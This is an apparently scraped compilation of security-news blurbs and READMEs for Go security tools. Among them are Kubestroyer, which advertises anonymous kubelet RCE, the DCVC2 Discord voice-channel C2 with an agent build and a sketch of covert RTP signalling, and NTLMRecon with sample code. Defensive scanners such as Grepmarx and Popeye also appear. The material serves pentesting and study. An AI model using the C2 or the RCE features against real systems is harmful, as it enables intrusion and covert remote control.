endpoints/billing/update-billing-info
endpoints/billing/get-account
endpoints/billing/create-account
endpoints/billing/list-subscriptions
endpoints/billing/create-new-subscription-purchase
endpoints/billing/create-one-time-payment
endpoints/billing/get-account
endpoints/billing/create-account
endpoints/billing/list-subscriptions
endpoints/billing/create-new-subscription-purchase
endpoints/billing/create-one-time-payment

One Line Command:

β–Ά echo 'target.com' | waybackurls | tee waybackresults.txt; cat waybackresults.txt | grep "\.js" > js_files.txt; go run main.go js_files.txt

// You can use Gau, HaKrawler, Katana, etc...

Credits

This tool was written in Golang 1.19.4, made with all love in Egypt! <3

Twitter@SirBagoza , Github@SirBugs



Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang calledΒ RDStealer. "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor VrabieΒ saidΒ in a technical report shared with The Hacker News. Evidence gathered by the Romanian

New Golang-based Skuld Malware Stealing Discord and Browser Data from Windows PCs

A new Golang-based information stealer calledΒ SkuldΒ has compromised Windows systems across Europe, Southeast Asia, and the U.S. "This new malware strain tries to steal sensitive information from its victims," Trellix researcher Ernesto FernΓ‘ndez ProvechoΒ saidΒ in a Tuesday analysis. "To accomplish this task, it searches for data stored in applications such as Discord and web browsers; information

Kubestroyer - Kubernetes Exploitation Tool

By: Zion3R

Kubestroyer

Kubestroyer aims to exploit Kubernetes cluster misconfigurations and to be the Swiss army knife of your Kubernetes pentests


About The Project

Kubestroyer is a Golang exploitation tool that aims to take advantage of Kubernetes cluster misconfigurations.

The tool scans known Kubernetes ports that may be exposed and can then exploit them, as sketched below.
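
As a rough illustration of that first step (not Kubestroyer's actual code), the sketch below probes a handful of well-known Kubernetes ports with plain TCP connects; the port list and the target address are illustrative assumptions.

// k8s_portscan_sketch.go - hedged sketch of a known-port scan, not Kubestroyer itself.
package main

import (
    "fmt"
    "net"
    "time"
)

// Commonly exposed Kubernetes control-plane and node ports (illustrative list).
var k8sPorts = map[int]string{
    2379:  "etcd client",
    2380:  "etcd peer",
    6443:  "kube-apiserver",
    8080:  "kube-apiserver (insecure)",
    10250: "kubelet API",
    10255: "kubelet read-only API",
    10256: "kube-proxy health",
}

func main() {
    target := "127.0.0.1" // placeholder target
    for port, desc := range k8sPorts {
        addr := fmt.Sprintf("%s:%d", target, port)
        conn, err := net.DialTimeout("tcp", addr, 2*time.Second)
        if err != nil {
            continue // closed or filtered
        }
        conn.Close()
        fmt.Printf("open %-5d %s\n", port, desc)
    }
}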

Getting Started

To get a local copy up and running, follow these simple example steps.

Prerequisites

  • Go 1.19
    wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz
    tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz

Installation

Use prebuilt binary

or

Using go install command :

$ go install github.com/Rolix44/Kubestroyer@latest

or

build from source:

  1. Clone the repo
    $ git clone https://github.com/Rolix44/Kubestroyer.git
  2. build the binary
    $ go build -o Kubestroyer cmd/kubestroyer/main.go 

Usage

Parameter Description Mand/opt Example
-t / --target Target (IP, domain or file) Mandatory -t localhost,127.0.0.1 / -t ./domain.txt
--node-scan Enable node port scanning (ports 30000 to 32767) Optional -t localhost --node-scan
--anon-rce RCE using Kubelet API anonymous auth Optional -t localhost --anon-rce
-x Command to execute when using RCE (displays the service account token by default) Optional -t localhost --anon-rce -x "ls -al"

Currently supported features

  • Target

    • List of multiple targets
    • Input file as target
  • Scanning

    • Known ports scan
    • Node port scan (30000 to 32767)
    • Port description
  • Vulnerabilities

    • Anon RCE on Kubelet
      • Choose command to execute

Roadmap

  • Choose the pod for anon RCE
  • Etcd exploit
  • Kubelet read-only API parsing for information disclosure

See the open issues for a full list of proposed features (and known issues).

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Rolix - @Rolix_cy - rolixcy@protonmail.com

Project Link: https://github.com/Rolix44/Kubestroyer



DCVC2 - A Golang Discord C2 Unlike Any Other

By: Zion3R


This multi operating system compatible tool was created to leverage Discord's voice channels for command and control operations. This tool operates entirely over the Real-time Transport Protocol (RTP), primarily leveraging DiscordGo, and leaves no pesky traces behind in text channels. It is a command-line tool, meaning all operations occur strictly from the terminal on Windows, Linux, or OSX. Please use responsibly but have fun! ;)
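
As a hedged sketch of the underlying idea (not DCVC2 itself), the snippet below uses DiscordGo to join a voice channel and push/pull raw frames over the voice (RTP) path, which is where a C2 like this can hide its traffic instead of audio. The bot token, guild ID and channel ID are placeholders.

// dcvc2_concept_sketch.go - conceptual sketch only, not the DCVC2 implementation.
package main

import (
    "log"
    "time"

    "github.com/bwmarrin/discordgo"
)

func main() {
    dg, err := discordgo.New("Bot " + "YOUR_BOT_TOKEN") // placeholder token
    if err != nil {
        log.Fatal(err)
    }
    if err := dg.Open(); err != nil { // open the gateway websocket connection
        log.Fatal(err)
    }
    defer dg.Close()

    // Join the voice channel; mute=false, deaf=false so we can both send and receive.
    vc, err := dg.ChannelVoiceJoin("GUILD_ID", "VOICE_CHANNEL_ID", false, false)
    if err != nil {
        log.Fatal(err)
    }
    defer vc.Disconnect()

    vc.Speaking(true)
    defer vc.Speaking(false)

    // Anything written to OpusSend is carried as RTP voice traffic; a covert
    // channel could encode its command/response bytes into these frames.
    select {
    case vc.OpusSend <- []byte("hello over the voice channel"):
    case <-time.After(2 * time.Second):
        log.Println("send timed out")
    }

    // Frames from other participants arrive on OpusRecv.
    select {
    case p := <-vc.OpusRecv:
        log.Printf("received %d bytes from SSRC %d", len(p.Opus), p.SSRC)
    case <-time.After(10 * time.Second):
        log.Println("no inbound frames")
    }
}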


Requirements:

  1. Read about DCVC2 (link updated; the previous link was wrong)
  2. You need a Discord account.
  3. You need a Discord server.
  4. Increase the voice channel bitrate to 96 kbps in the server settings.
  5. You need 2 Discord bots. I found it easiest to give both bots admin perms over the discord server but you can fine tune them to only need voice permissions. The best guide to create bots is here.

Build:

git clone https://github.com/3NailsInfoSec/DCVC2.git
cd DCVC2
go mod download
go build server.go
go build agent.go

Usage:

When you execute the server and agent you should see both join the voice channel you specify:

Shell commands:

cmd> whoami

desktop-3kjj3kj\sm00v

I added 2 hardcoded additions besides basic shell usage:

cmd> screenshot
screenshotting..............................................

&

cmd> download
download file path>C:\Users\sm00v\Downloads\34954477.jpg
............................................................

Credits

Twitter: @sm00v

Github: @sm00v



New GobRAT Remote Access Trojan Targeting Linux Routers in Japan

Linux routers in Japan are the target of a new Golang remote access trojan (RAT) calledΒ GobRAT. "Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC)Β saidΒ in a report published today. The compromise of an internet-exposed router is followed by the

Hackers Using Golang Variant of Cobalt Strike to Target Apple macOS Systems

A Golang implementation of Cobalt Strike called Geacon is likely to garner the attention of threat actors looking to target Apple macOS systems. That's according to findings from SentinelOne, which observed an increase in the number of Geacon payloads appearing on VirusTotal in recent months. "While some of these are likely red-team operations, others bear the characteristics of genuine

NTLMRecon - A Tool For Performing Light Brute-Forcing Of HTTP Servers To Identify Commonly Accessible NTLM Authentication Endpoints

By: Zion3R


NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.

The tool supports collecting metadata from the exposed NTLM authentication endpoints, including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motivations behind its development and how we are approaching more advanced metadata collection within Chariot.
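
The following is a minimal, hedged sketch of that unauthenticated metadata trick (not NTLMRecon's own code): build a bare NTLM NEGOTIATE_MESSAGE, send it in an Authorization header, and decode the NetBIOS/DNS names from the AV_PAIR list of the returned CHALLENGE_MESSAGE. Field offsets follow MS-NLMP; the target URL is a placeholder.

// ntlm_challenge_sketch.go - hedged sketch, not the NTLMRecon implementation.
package main

import (
    "encoding/base64"
    "encoding/binary"
    "fmt"
    "net/http"
    "os"
    "strings"
    "unicode/utf16"
)

// buildNegotiate returns a minimal NTLM type-1 message: signature, message
// type 1, and flags requesting Unicode strings and the target name.
func buildNegotiate() []byte {
    msg := make([]byte, 32)
    copy(msg, "NTLMSSP\x00")
    binary.LittleEndian.PutUint32(msg[8:], 1)           // MessageType = NEGOTIATE
    binary.LittleEndian.PutUint32(msg[12:], 0x00000207) // UNICODE | OEM | REQUEST_TARGET | NTLM
    return msg
}

// parseChallenge walks the AV_PAIR list of an NTLM type-2 (CHALLENGE) message.
func parseChallenge(blob []byte) map[string]string {
    out := map[string]string{}
    if len(blob) < 48 || string(blob[:8]) != "NTLMSSP\x00" {
        return out
    }
    infoLen := int(binary.LittleEndian.Uint16(blob[40:]))
    infoOff := int(binary.LittleEndian.Uint32(blob[44:]))
    if infoOff+infoLen > len(blob) {
        return out
    }
    info := blob[infoOff : infoOff+infoLen]
    names := map[uint16]string{1: "netbiosComputerName", 2: "netbiosDomainName",
        3: "dnsComputerName", 4: "dnsDomainName", 5: "forestName"}
    for len(info) >= 4 {
        id := binary.LittleEndian.Uint16(info[0:])
        l := int(binary.LittleEndian.Uint16(info[2:]))
        if id == 0 || len(info) < 4+l { // MsvAvEOL terminates the list
            break
        }
        u := make([]uint16, l/2) // values are UTF-16LE strings
        for i := range u {
            u[i] = binary.LittleEndian.Uint16(info[4+2*i:])
        }
        if n, ok := names[id]; ok {
            out[n] = string(utf16.Decode(u))
        }
        info = info[4+l:]
    }
    return out
}

func main() {
    endpoint := os.Args[1] // e.g. https://autodiscover.contoso.com/EWS/ (placeholder)
    req, _ := http.NewRequest("GET", endpoint, nil)
    req.Header.Set("Authorization", "NTLM "+base64.StdEncoding.EncodeToString(buildNegotiate()))
    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()
    for _, h := range resp.Header.Values("Www-Authenticate") {
        if strings.HasPrefix(h, "NTLM ") {
            raw, _ := base64.StdEncoding.DecodeString(strings.TrimPrefix(h, "NTLM "))
            fmt.Printf("%+v\n", parseChallenge(raw))
        }
    }
}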


Why build a new version of this capability?

We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang and we didn't want to have to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected, etc.

Installation

The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.

go install github.com/praetorian-inc/NTLMRecon/cmd/NTLMRecon@latest

Usage

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:

NTLMRecon -t https://autodiscover.contoso.com

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:

NTLMRecon -t https://autodiscover.contoso.com -o json

Example JSON Output

Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:

{
  "url": "https://autodiscover.contoso.com/EWS/",
  "ntlm": {
    "netbiosComputerName": "MSEXCH1",
    "netbiosDomainName": "CONTOSO",
    "dnsDomainName": "na.contoso.local",
    "dnsComputerName": "msexch1.na.contoso.local",
    "forestName": "contoso.local"
  }
}
➜  ~ NTLMRecon -t https://adfs.contoso.com -o json | jq
{
  "url": "https://adfs.contoso.com/adfs/services/trust/2005/windowstransport",
  "ntlm": {
    "netbiosComputerName": "MSFED1",
    "netbiosDomainName": "CONTOSO",
    "dnsDomainName": "corp.contoso.com",
    "dnsComputerName": "MSEXCH1.corp.contoso.com",
    "forestName": "contoso.com"
  }
}
➜ ~ NTLMRecon -t https://autodiscover.contoso.com
https://autodiscover.contoso.com/Autodiscover
https://autodiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root
https://autodiscover.contoso.com/Autodiscover/Autodiscover.xml
https://autodiscover.contoso.com/EWS/
https://autodiscover.contoso.com/OAB/
https://autodiscover.contoso.com/Rpc/
➜ ~

Potential Additional Features

Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:

  • Concurrency and Performance Improvements: There could be some additional improvements to concurrency and performance. Currently, the tool sequentially makes HTTP requests and waits for the previous request to be performed.
  • Batch Scanning Functionality: Another idea would be to extend the NTLMRecon utility to accept a list of hosts from standard input. One usage scenario for this could be an attacker running a combination of β€œsubfinder | httpx | NTLMRecon” to enumerate HTTP servers and then identify NTLM authentication endpoints that are exposed externally across an entire attack surface.
  • One-off Data Collection Capability: A user may wish to perform one-off data collection targeting a specific endpoint which is currently not supported by NTLMRecon.
  • User-Agent Randomization or Control: A user may wish to randomize the user-agents used to make requests. Alternatively when targeting Microsoft Exchange servers sometimes using a user-agent with a mobile client or legacy third-party email client can allow requests to the /EWS/Exchange.asmx endpoint through, etc.

References

[1] https://www.praetorian.com/blog/automating-the-discovery-of-ntlm-authentication-endpoints/



Seekr - A Multi-Purpose OSINT Toolkit With A Neat Web-Interface


A multi-purpose toolkit for gathering and managing OSINT-Data with a neat web-interface.


Introduction

Seekr is a multi-purpose toolkit for gathering and managing OSINT-data with a sleek web interface. The backend is written in Go and offers a wide range of features for data collection, organization, and analysis. Whether you're a researcher, investigator, or just someone looking to gather information, seekr makes it easy to find and manage the data you need. Give it a try and see how it can streamline your OSINT workflow!

Check the wiki for setup guide, etc.

Why use seekr over my current tool ?

Seekr combines note-taking and OSINT in one application. Seekr can be used alongside your current tools. Seekr is designed with OSINT in mind and optimized for real-world use cases.

Key features

  • Database for OSINT targets
  • GitHub to email (a rough sketch of how such a lookup can work follows this list)
  • Account cards for each person in the database
  • Account discovery integrating with the account cards
  • Predefined commonly used fields in the database
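
As referenced in the feature list above, here is a rough, hedged sketch of one way a GitHub-to-email lookup can work (this is not seekr's implementation): public commits on a repository expose author names and emails through the GitHub REST API. The OWNER/REPO values are placeholders.

// github_to_email_sketch.go - illustrative OSINT sketch, not seekr's code.
package main

import (
    "encoding/json"
    "fmt"
    "net/http"
)

type commit struct {
    Commit struct {
        Author struct {
            Name  string `json:"name"`
            Email string `json:"email"`
        } `json:"author"`
    } `json:"commit"`
}

func main() {
    // Unauthenticated requests are rate limited; add a token header for real use.
    resp, err := http.Get("https://api.github.com/repos/OWNER/REPO/commits?per_page=100")
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()

    var commits []commit
    if err := json.NewDecoder(resp.Body).Decode(&commits); err != nil {
        panic(err)
    }
    seen := map[string]bool{}
    for _, c := range commits {
        a := c.Commit.Author
        if !seen[a.Email] {
            seen[a.Email] = true
            fmt.Printf("%s <%s>\n", a.Name, a.Email) // unique author name/email pairs
        }
    }
}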

Getting Started - Installation

Windows

Download the latest exe here

Linux (stable)

Download the latest stable binary here

Linux (unstable)

To install seekr on Linux, simply run:

git clone https://github.com/seekr-osint/seekr
cd seekr
go run main.go

Now open the web interface in your browser of choice.

Run on NixOS

Seekr is built with NixOS in mind and therefore supports Nix flakes. To run seekr on NixOS, run the following commands.

nix shell github:seekr-osint/seekr
seekr

Integrating seekr into your current workflow

journey
title How to integrate seekr into your current workflow.
section Initial Research
Create a person in seekr: 100: seekr
Simple web research: 100: Known tools
Account scan: 100: seekr
section Deeper account investigation
Investigate the accounts: 100: seekr, Known tools
Keep notes: 100: seekr
section Deeper Web research
Deep web research: 100: Known tools
Keep notes: 100: seekr
section Finishing the report
Export the person with seekr: 100: seekr
Done.: 100

Feedback

We would love to hear from you. Tell us your opinions on seekr. Where do we need to improve? You can do this by just opening an issue, or maybe even by telling others about your experience in your blog or somewhere else.

Legal Disclaimer

This tool is intended for legitimate and lawful use only. It is provided for educational and research purposes, and should not be used for any illegal or malicious activities, including doxxing. Doxxing is the practice of researching and broadcasting private or identifying information about an individual without their consent, and can be illegal. The creators and contributors of this tool will not be held responsible for any misuse or damage caused by this tool. By using this tool, you agree to use it only for lawful purposes and to comply with all applicable laws and regulations. It is the responsibility of the user to ensure compliance with all relevant laws and regulations in the jurisdiction in which they operate. Misuse of this tool may result in criminal and/or civil prosecution.



Grepmarx - A Source Code Static Analysis Platform For AppSec Enthusiasts


Grepmarx is a web application providing a single platform to quickly understand, analyze and identify vulnerabilities in possibly large and unknown code bases.

Features

SAST (Static Analysis Security Testing) capabilities:

  • Multiple languages support: C/C++, C#, Go, HTML, Java, Kotlin, JavaScript, TypeScript, OCaml, PHP, Python, Ruby, Bash, Rust, Scala, Solidity, Terraform, Swift
  • Multiple frameworks support: Spring, Laravel, Symfony, Django, Flask, Node.js, jQuery, Express, Angular...
  • 1600+ existing analysis rules
  • Easily extend analysis rules using Semgrep syntax: https://semgrep.dev/editor
  • Manage rules in rule packs to tailor code scanning

SCA (Software Composition Analysis) capabilities:

  • Multiple package-dependency formats support: NPM, Maven, Gradle, Composer, pip, Gopkg, Gem, Cargo, NuPkg, CSProj, PubSpec, Cabal, Mix, Conan, Clojure, Docker, GitHub Actions, Jenkins HPI, Kubernetes
  • SBOM (Software Bill-of-Materials) generation (CycloneDX compliant)

Extra

  • Analysis workbench designed to efficiently browse scan results
  • Scan code that doesn't compile
  • Comprehensive LOC (Lines of Code) counter
  • Inspector: automatic application features discovery
  • ... and a Dark Mode

Screenshots

Scan customization Analysis workbench Rule pack edition

Execution

Grepmarx is provided with a configuration to be executed in Docker and Gunicorn.

Docker execution


Make sure you have docker-compose installed on the system and that the Docker daemon is running. The application can then be easily executed in a Docker container. The steps:

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Start the app in Docker

$ sudo docker-compose pull && sudo docker-compose build && sudo docker-compose up -d

Visit http://localhost:5000 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Gunicorn


Gunicorn 'Green Unicorn' is a Python WSGI HTTP Server for UNIX. A supervisor configuration file is provided to start it along with the required Celery worker (used for security scans queuing).

Install using pip

$ pip install gunicorn supervisor

Start the app using gunicorn binary

$ supervisord -c supervisord.conf

Visit http://localhost:8001 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Build from sources

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Install virtualenv modules

$ virtualenv env
$ source env/bin/activate

Install Python modules

$ # SQLite Database (Development)
$ pip3 install -r requirements.txt
$ # OR with PostgreSQL connector (Production)
$ # pip install -r requirements-pgsql.txt

Install additional requirements

# Dependency scan (cdxgen / depscan) requirements
$ sudo apt install npm openjdk-17-jdk maven gradle golang composer
$ sudo npm install -g @cyclonedx/cdxgen
$ pip install appthreat-depscan

A Redis server is required to queue security scans. Install the redis package with your favorite distro package manager, then:

$ redis-server

Set the FLASK_APP environment variable

$ export FLASK_APP=run.py
$ # Set up the DEBUG environment
$ # export FLASK_ENV=development

Start the celery worker process

$ celery -A app.celery_worker.celery worker --pool=prefork --loglevel=info --detach

Start the application (development mode)

$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)
$ # --port=5000 - specify the app port (default 5000)
$ flask run --host=0.0.0.0 --port=5000

Access grepmarx in browser: http://127.0.0.1:5000/

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Credits & Links



Grepmarx - Provided by Orange Cyberdefense.



New GoLang-Based HinataBot Exploiting Router and Server Flaws for DDoS Attacks

A new Golang-based botnet dubbedΒ HinataBotΒ has been observed to leverage known flaws to compromise routers and servers and use them to stage distributed denial-of-service (DDoS) attacks. "The malware binaries appear to have been named by the malware author after a character from the popular anime series, Naruto, with file name structures such as 'Hinata-<OS>-<Architecture>,'" AkamaiΒ saidΒ in a

Titan Stealer: A New Golang-Based Information Stealer Malware Emerges

A new Golang-based information stealer malware dubbedΒ Titan StealerΒ is being advertised by threat actors through their Telegram channel. "The stealer is capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files," Uptycs security researchers

Ukraine Hit with New Golang-based 'SwiftSlicer' Wiper Malware in Latest Cyber Attack

Ukraine has come under a fresh cyber onslaught from Russia that involved the deployment of a previously undocumented Golang-based data wiper dubbedΒ SwiftSlicer. ESET attributed the attack to Sandworm, a nation-state group linked to Military Unit 74455 of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "Once executed it deletes shadow

Chinese Hackers Utilize Golang Malware in DragonSpark Attacks to Evade Detection

Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed DragonSpark while employing uncommon tactics to go past security layers. "The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOneΒ saidΒ in an analysis published today. A striking

Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

Popeye is a utility that scans live Kubernetes clusters and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed, not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resource over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a read-only tool; it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Unix using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source: Popeye was built using Go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following replace directive to your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

  • Popeye uses 256-color terminal mode. On *Nix systems make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs and inspects Kubernetes resources on live clusters and sanitizes resources as they are in the wild!

Here is a list of some of the available sanitizers:

Resource Sanitizers Aliases

Node no
Conditions ie not ready, out of mem/disk, network, pids, etc
Pod tolerations referencing node taints
CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)

Namespace ns
Inactive
Dead namespaces

Pod po
Pod status
Containers statuses
ServiceAccount presence
CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
Container image with no tags
Container image using latest tag
Resources request/limits presence
Probes liveness/readiness presence
Named ports and their references

Service svc
Endpoints presence
Matching pods labels
Named ports and their references

ServiceAccount sa
Unused, detects potentially unused SAs

Secrets sec
Unused, detects potentially unused secrets or associated keys

ConfigMap cm
Unused, detects potentially unused cm or associated keys

Deployment dp, deploy
Unused, pod template validation, resource utilization

StatefulSet sts
Unused, pod template validation, resource utilization

DaemonSet ds
Unused, pod template validation, resource utilization

PersistentVolume pv
Unused, check volume bound or volume error

PersistentVolumeClaim pvc
Unused, check bounded or volume mount error

HorizontalPodAutoscaler hpa
Unused, Utilization, Max burst checks

PodDisruptionBudget
Unused, Check minAvailable configuration pdb

ClusterRole
Unused cr

ClusterRoleBinding
Unused crb

Role
Unused ro

RoleBinding
Unused rb

Ingress
Valid ing

NetworkPolicy
Valid np

PodSecurityPolicy
Valid psp

You can also see the full list of codes

Save the report

To save the Popeye report to a file, pass the --save flag to the command. By default it will create a temp directory and store the report there; the path of the temp directory will be printed to STDOUT. If you need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follows the format sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. "sanitizer-mycluster-1594019782530851873.html"). If you need to specify the output file name for the report, you can pass the --output-file flag with the filename you want as parameter.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or another S3-compatible object storage) by providing the flag --s3-bucket. As a parameter, you need to provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory, provide the bucket parameter as bucket/path/to/report.

Under the hood, the AWS Go library is used, which handles the credential loading. For more information, check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS S3 is not your bag, you can further define an S3-compatible storage (OVHcloud Object Storage, Minio, Google Cloud Storage, etc...) using s3-endpoint and s3-region as so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever CLI args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v:

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, the report is written to /tmp inside the container, and the container is then deleted when popeye exits, which means you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting the POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format Description Default Credits
standard The full monty output iconized and colorized yes
jurassic No icons or color like it's 1979
yaml As YAML
html As HTML
json As JSON
junit For the Java melancholic
prometheus Dumps the report as Prometheus-scrapable metrics dardanel
score Returns a single cluster sanitizer score value (0-100) kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBudgets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye "configless" to make sure you will recognize any new issues that may have arisen in your clusters...

Here is an example spinach file as it stands in this release. There is a fuller EKS- and AKS-based spinach file in this repo under spinach. (BTW: for newcomers to the project, this might be a great way to contribute, by adding cluster-specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
# Checks resources against reported metrics usage.
# If over/under these thresholds a sanitization warning will be issued.
# Your cluster must run a metrics-server for these to take place!
allocations:
cpu:
underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if cpu is over allocated by more than 50% at current load.
memory:
underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if mem is over allocated by more than 50% usage at current load.

# Excludes excludes certain resources from Popeye scans
excludes:
v1/pods:
# In the monitoring namespace excludes all probes check on pod's containers.
- name: rx:monitoring
codes:
- 102
# Excludes all istio-proxy container scans for pods in the icx namespace.
- name: rx:icx/.*
containers:
# Excludes istio init/sidecar container from scan!
- istio-proxy
- istio-init
# ConfigMap sanitizer exclusions...
v1/configmaps:
# Excludes key must match the singular form of the resource.
# For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
- name: rx:fred.+\.v\d+
# Namespace sanitizer exclusions...
v1/namespaces:
# Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
- name: rx:kube
codes:
- 404
# Exclude all istio* namespaces from being scanned.
- name: rx:istio
